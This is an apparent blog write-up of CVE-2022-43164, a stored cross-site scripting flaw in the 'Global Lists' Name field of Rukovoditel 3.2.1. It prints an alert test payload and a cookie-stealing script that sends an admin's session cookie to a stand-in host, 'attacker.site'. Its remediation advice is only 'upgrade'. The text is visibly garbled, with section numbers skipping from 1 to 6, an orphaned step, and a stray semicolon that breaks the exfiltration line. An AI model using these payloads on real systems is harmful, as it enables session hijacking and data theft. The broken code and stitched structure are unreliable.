CVE-2022-43164 - Rukovoditel v3.2.1 Global Lists Stored XSS – How Attackers Can Own Your Admin Panel

CVE-2022-43164 is a critical stored cross-site scripting (XSS) vulnerability found in the Rukovoditel open-source project management software, specifically version 3.2.1. This flaw lets authenticated users inject malicious JavaScript into the "Global Lists" feature, potentially hijacking admin sessions, stealing data, or spreading malware.

If you run Rukovoditel and haven’t patched, this is your wake-up call. Let’s see how this works in detail, learn how you can test it, and how to secure your business from getting owned.

1. Vulnerable Feature: Global Lists

Rukovoditel’s “Global Lists” are reusable lists you can apply throughout your project. The vulnerability lives in this feature, where new list entries are created.

The insecure part is in /index.php?module=global_lists/lists – specifically, the Name input field users fill out when adding to the list.

Submit the form.

Once submitted, the “Global Lists” page will now display the payload as part of the list, and anyone viewing the page—including admins—will trigger the script.

Here is a sample JavaScript payload that pops up XSS

"><script>alert('XSS')</script>

How to insert

- Name: "><script>alert('XSS')</script>

Submit this as the “Name” when creating the list.

Result:  
When someone views the Global Lists page, the script executes and an alert box pops up (or, with a more malicious payload, attacker code runs in the victim’s browser).

Here’s a simple payload that grabs the admin cookie and sends it to the attacker

"><script>
  fetch('https://attacker.site/cookie?'; + document.cookie)
</script>

The attacker would set up attacker.site to log incoming GET requests. When an admin or another user views the infected Global List, the attacker receives the session cookie.

6. References

- CVE-2022-43164 NVD Listing
- Rukovoditel
- Exploit-Database reference (if/when public)

7. How to Fix

- Upgrade to the latest Rukovoditel version (check official downloads).

Summary

CVE-2022-43164 is a classic yet serious vulnerability, showing how unchecked input in a “simple” field can undermine an entire application or business. Stored XSS lingers, and can be used to hijack accounts, deliver malware, or further compromise your project management data.

Timeline

Published on: 10/28/2022 17:15:00 UTC
Last modified on: 10/28/2022 18:52:00 UTC